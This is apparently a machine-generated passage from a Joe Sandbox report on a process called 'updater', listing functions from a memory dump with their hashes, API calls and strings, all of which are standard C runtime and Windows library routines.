Instruction Fuzzy Hash: 4AC15C75D0024A9FDF15DFD8C984AEEBBB9FF58314F14401EEA09AB251D730AA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013F7380 Relevance: 6.3, APIs: 4, Instructions: 304COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 013F7387
_strcspn.LIBCMT ref: 013F73EF
_strcspn.LIBCMT ref: 013F740F
ctype.LIBCPMT ref: 013F747B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: cc0e85da56da7ce6c7e4de6428595e2487d8b3db50ccb926d91bcebb2c267f8f
Instruction ID: 93c886b48319e364e60b1412b043e24f825ea38739e375c66b78cc56692d5b57
Opcode Fuzzy Hash: cc0e85da56da7ce6c7e4de6428595e2487d8b3db50ccb926d91bcebb2c267f8f
Instruction Fuzzy Hash: B0C1607190024ADFDF15DF98C884AEEBFB9FF18318F14402EEA45AB251D7309A55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01411199 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01411260
___AdjustPointer.LIBCMT ref: 01411283
___AdjustPointer.LIBCMT ref: 0141131F

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ed97ca2aaf2864779fbe1308088066ff9a54c38f4477899e559284de04694926
Instruction ID: a8e4997d949ccd93b69a85071296df0855f121828d31c7e84ea15c4fca6697e8
Opcode Fuzzy Hash: ed97ca2aaf2864779fbe1308088066ff9a54c38f4477899e559284de04694926
Instruction Fuzzy Hash: C851B4B16016069FEB258F6AD840BAB7BA4FF14B10F14452FEB05A77B8D731E880C790

Uniqueness

Uniqueness Score: -1.00%

Function 01423473 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8bff6735ff35526ae459ff26d0cde05b8632130da584d79cdd36ecfcf6409f
Instruction ID: ded41f985ae6e958f2da51003e9a394811914b8507656499898b6054beb36ac5
Opcode Fuzzy Hash: 3a8bff6735ff35526ae459ff26d0cde05b8632130da584d79cdd36ecfcf6409f
Instruction Fuzzy Hash: 5241C376A00315AFD7259F79C841B5ABBF9FB9C720F10466FE115DB3A0E275A9808780

Uniqueness

Uniqueness Score: -1.00%

Function 0142F78E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0142F85E
_free.LIBCMT ref: 0142F887
SetEndOfFile.KERNEL32(00000000,0142C3CA,00000000,01420CCF,?,?,?,?,?,?,?,0142C3CA,01420CCF,00000000), ref: 0142F8B9
GetLastError.KERNEL32(?,?,?,?,?,?,?,0142C3CA,01420CCF,00000000,?,?,?,?,00000000), ref: 0142F8D5

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 078492f2fbb5df41120de22d9a62a20485ff3ef8207b22cc1d6279fded6977ac
Instruction ID: cdd3cad652156ae05ab1f07aa0d907f89457ebe67988f43ce825264ede826e9e
Opcode Fuzzy Hash: 078492f2fbb5df41120de22d9a62a20485ff3ef8207b22cc1d6279fded6977ac
Instruction Fuzzy Hash: C941D8729005729BDB11ABBACC40B5EBA75EF64320FD4051BE514A72B4EBB4D4888761

Uniqueness

Uniqueness Score: -1.00%

Function 0143173A Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(83000000,4350CDAC,0000001C,4350CDAC,?,?,?), ref: 01431656
__FindPESection.LIBCMT ref: 01431693
_ValidateScopeTableHandlers.LIBCMT ref: 014316B3
__FindPESection.LIBCMT ref: 014316CD

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FindSection$HandlersQueryScopeTableValidateVirtual
String ID:
API String ID: 1876002356-0
Opcode ID: dd8ace880eec46a1db9cfb512da37a17276cdc74447491f3e1ed1a62a90bd73f
Instruction ID: d8adc4877d6b979f89b321f582a9e8be459fb37df3e378ee948debc87abe3de8
Opcode Fuzzy Hash: dd8ace880eec46a1db9cfb512da37a17276cdc74447491f3e1ed1a62a90bd73f
Instruction Fuzzy Hash: FF318475B003058BEF25DBAD99406AE77A8EB8C750F19016AED09D7372D731EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01427877 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0141AF9F: _free.LIBCMT ref: 0141AFAD

Part of subcall function 0142749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0142165F,?,00000000,00000000), ref: 0142753D

GetLastError.KERNEL32 ref: 014278DF
__dosmaperr.LIBCMT ref: 014278E6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 01427925
__dosmaperr.LIBCMT ref: 0142792C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: cedfcef43cc9916c2b1622797f9eccefa41b73d456016358ef01be73bda86815
Instruction ID: c7c0adcf17f8c3e9363f76efbe832fbaecf407ca080b93a96b83f592e76b1ac7
Opcode Fuzzy Hash: cedfcef43cc9916c2b1622797f9eccefa41b73d456016358ef01be73bda86815
Instruction Fuzzy Hash: 69218871604326AFAB21AF668C8096BB7ACFF34275740451BF85997271E770DC808BA0

Uniqueness

Uniqueness Score: -1.00%

Function 013D38F9 Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 013D2F5C: GetVersionExA.KERNEL32(?), ref: 013D2F80

GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 013D3919
GetFullPathNameW.KERNEL32(00000000,?,00000000,00000000), ref: 013D393B

Part of subcall function 01415640: _free.LIBCMT ref: 01415653

Part of subcall function 013D2FF8: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 013D300F
Part of subcall function 013D2FF8: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 013D3036

GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000), ref: 013D3951
GetFullPathNameA.KERNEL32(00000000,00000003,00000000,00000000), ref: 013D397B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FullNamePath$ByteCharMultiWide$Version_free
String ID:
API String ID: 3265977510-0
Opcode ID: a446339892e98d355b4c4958f3d264607ae3f63db7a452e06ec3dd89c90dabb3
Instruction ID: 9f7d2e98e52c21fd5afd5b4c15aeb19e878b2cb39b14982c5e43e63ef4dca826
Opcode Fuzzy Hash: a446339892e98d355b4c4958f3d264607ae3f63db7a452e06ec3dd89c90dabb3
Instruction Fuzzy Hash: 8711E7B7501216BFDB21BBBAFC44DAF7A6DEFA25657000419F1099A154DF308D05C3B2

Uniqueness

Uniqueness Score: -1.00%

Function 0141AE9E Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c48ea89069a6f250f043219782bd253901d6eaba3a2a68af005017af8da23a
Instruction ID: a15117719ee5f4bdd3e2e5753d1d3ef323839d4b0286d58db904a09dab8aff5b
Opcode Fuzzy Hash: 62c48ea89069a6f250f043219782bd253901d6eaba3a2a68af005017af8da23a
Instruction Fuzzy Hash: 9021A4F1605256BFDB21AF768C9096BB7ACEF54274720851BF418D72B8E731DC4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0142049B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
_free.LIBCMT ref: 014204FD
_free.LIBCMT ref: 01420533
SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b03057c8a85f29ba593305a844f5b1384a179d5f20ece09c8c89ce541679119c
Instruction ID: e28ee9f6929840eb046e0b92c970c4805b87361cfff407352136730e193ef6bd
Opcode Fuzzy Hash: b03057c8a85f29ba593305a844f5b1384a179d5f20ece09c8c89ce541679119c
Instruction Fuzzy Hash: DB1101722022127E971126795C84E2B25D7ABE1671795423BF618832F5FD71CCC68230

Uniqueness

Uniqueness Score: -1.00%

Function 014205F2 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 014205F7
_free.LIBCMT ref: 01420654
_free.LIBCMT ref: 0142068A
SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 01420695

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7f19823a73df2c0a7f9ca282b060059d84f7e0087615cd7b8f2cae527d49ce39
Instruction ID: 69c2f77c9a0d26a1b93a54379f21fecec979b4089e55dcdbd1f33f97778ae1b7
Opcode Fuzzy Hash: 7f19823a73df2c0a7f9ca282b060059d84f7e0087615cd7b8f2cae527d49ce39
Instruction Fuzzy Hash: C211CA712012227ED73126795C84E2B25DBABE1675BB5012BF62C932F5FD7188869220

Uniqueness

Uniqueness Score: -1.00%

Function 013F864B Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 013F8652

Part of subcall function 013F70FE: std::_Lockit::_Lockit.LIBCPMT ref: 013F710F
Part of subcall function 013F70FE: int.LIBCPMT ref: 013F7126
Part of subcall function 013F70FE: std::_Lockit::~_Lockit.LIBCPMT ref: 013F7180

_Find_elem.LIBCPMT ref: 013F8864

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 013F86BA

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2124549159-2799312399
Opcode ID: 137461ec4234aac6105011ae2abc95f1761cf9169dd1141e63fb2c33dbd41de3
Instruction ID: 84377cf7fa3ee6b4aace565be8dabf752f2fa900d3ff65a3a49c703dd3a8d0ae
Opcode Fuzzy Hash: 137461ec4234aac6105011ae2abc95f1761cf9169dd1141e63fb2c33dbd41de3
Instruction Fuzzy Hash: BDD1B370D043899EEF1ADBACC490BEDBFB5AF55318F28409DD6856F282CB349949CB11

Uniqueness

Uniqueness Score: -1.00%

Function 014004A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014004AA

Part of subcall function 013FC8C4: std::_Lockit::_Lockit.LIBCPMT ref: 013FC8D5
Part of subcall function 013FC8C4: int.LIBCPMT ref: 013FC8EC
Part of subcall function 013FC8C4: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC946

_Find_elem.LIBCPMT ref: 014006FA

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 01400521

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2124549159-2799312399
Opcode ID: a340009bb101da33d3f97b75ba703271a59555c675ea25125c1d4dbc868adf55
Instruction ID: 634e94782a755ea81613a9017b503f7a77c6f2bb890d3d2d7ef1fc1d818c8c34
Opcode Fuzzy Hash: a340009bb101da33d3f97b75ba703271a59555c675ea25125c1d4dbc868adf55
Instruction Fuzzy Hash: B4D1C031D042598EEF27DF6AC8447EDBBB2BF54354F1440ABE8896B2D2DB348985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014008C3 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014008CD

Part of subcall function 013FC959: std::_Lockit::_Lockit.LIBCPMT ref: 013FC96A
Part of subcall function 013FC959: int.LIBCPMT ref: 013FC981
Part of subcall function 013FC959: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC9DB

_Find_elem.LIBCPMT ref: 01400B1D

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 01400944

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2124549159-2799312399
Opcode ID: 2e99af9c240b630c42cd10252d8cfe0e2a72144571c7b132114cb6e3a661cfe4
Instruction ID: 249d4551d061d67ec45c790cd27a4a3230f8f810f8b21b91d3e36c0acb8c50bf
Opcode Fuzzy Hash: 2e99af9c240b630c42cd10252d8cfe0e2a72144571c7b132114cb6e3a661cfe4
Instruction Fuzzy Hash: 34D19330D042598EEF269FA9C8547EDBBB1BF15354F1481ABE8896B2D2DB3448C5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0141AB7D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0141AC0D

Strings

pow, xrefs: 0141ABE5, 0141AC02

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 20323f72399cd6aca6f77d42719c1376b99cd7f01b07119f435428fe711a64cf
Instruction ID: 38dbdf1e38a713a0c9780772fdf6dd6fab7485a32159106f368f51416ef6001a
Opcode Fuzzy Hash: 20323f72399cd6aca6f77d42719c1376b99cd7f01b07119f435428fe711a64cf
Instruction Fuzzy Hash: B5516871A0A14287DB22772CDA0037B3BA5AF60702FB44D6BE195473BDEB3584D68B46

Uniqueness

Uniqueness Score: -1.00%

Function 0140CA1F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0140CB80

Strings

-, xrefs: 0140CBAE
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0140CADE, 0140CB15, 0140CB1A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: fcd62588a22f11f793a42950af8d2244f4fb8be4e6e68cacb313f63ea91f23a4
Instruction ID: c0915bb89b18d7e1449149f035c7c21c9e128d7f36e89b2551052550730988a3
Opcode Fuzzy Hash: fcd62588a22f11f793a42950af8d2244f4fb8be4e6e68cacb313f63ea91f23a4
Instruction Fuzzy Hash: 0751C430A04685DADF27CEAE94C17BFBFB5AF45210F0442FBE591973E1D27485829B50

Uniqueness

Uniqueness Score: -1.00%

Function 014079AB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014079B2
swprintf.LIBCMT ref: 01407A24

Part of subcall function 013FC009: std::_Lockit::_Lockit.LIBCPMT ref: 013FC01A
Part of subcall function 013FC009: int.LIBCPMT ref: 013FC031
Part of subcall function 013FC009: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC08B

Part of subcall function 01404907: _wmemset.LIBCMT ref: 0140492A

Strings

%.0Lf, xrefs: 01407A1C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3_Lockit::_Lockit::~__wmemsetswprintf
String ID: %.0Lf
API String ID: 3799663735-1402515088
Opcode ID: 8cdd719c5ab3563041a7118177b3f4b218ac57900ca6e0af59cc5101495895ca
Instruction ID: 93d7f07ee4cb4de0f0f34ebb6d661b425e64baa442d8a38aa9a61f9826d4706b
Opcode Fuzzy Hash: 8cdd719c5ab3563041a7118177b3f4b218ac57900ca6e0af59cc5101495895ca
Instruction Fuzzy Hash: 6751BE71D00209AFCF06DFD5D844AEDBBB5FF08311F10441AE945AB2A4EB35A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013DD4AF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

%.2x, xrefs: 013DD622

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: %.2x
API String ID: 0-936724101
Opcode ID: 679c500c8f70747352a9641c5cd8a4c6b3812fede3707d55356ad05638f754d9
Instruction ID: 342a1bff8eb27bf39e6273a468f9187f0bbe360ef7045818abc90d47eee6f9ab
Opcode Fuzzy Hash: 679c500c8f70747352a9641c5cd8a4c6b3812fede3707d55356ad05638f754d9
Instruction Fuzzy Hash: B651EF72A04B42EFD714CF6CD481BA0BBB5BF59314F1481AAD948CBA96E330E551CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0140C40C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0140C413
swprintf.LIBCMT ref: 0140C485

Part of subcall function 013F6F3F: std::_Lockit::_Lockit.LIBCPMT ref: 013F6F50
Part of subcall function 013F6F3F: int.LIBCPMT ref: 013F6F67
Part of subcall function 013F6F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 013F6FC1

Strings

%.0Lf, xrefs: 0140C47D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3_Lockit::_Lockit::~_swprintf
String ID: %.0Lf
API String ID: 2921955253-1402515088
Opcode ID: 399fd9eefeac3e51af76779135b7adf13aa3735b53482d53405e328e842b44a5
Instruction ID: 236217a25ba3cd7511825acff1544c0cabb86f84d54c60c19389449959e0b65b
Opcode Fuzzy Hash: 399fd9eefeac3e51af76779135b7adf13aa3735b53482d53405e328e842b44a5
Instruction Fuzzy Hash: DB518AB1D00209EFCB0ADFD4C884AEDBBB5FF18310F10456AE845AB2A4DB359955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014117A6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 014117CB

Strings

MOC, xrefs: 014117DD
RCC, xrefs: 014117E5

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

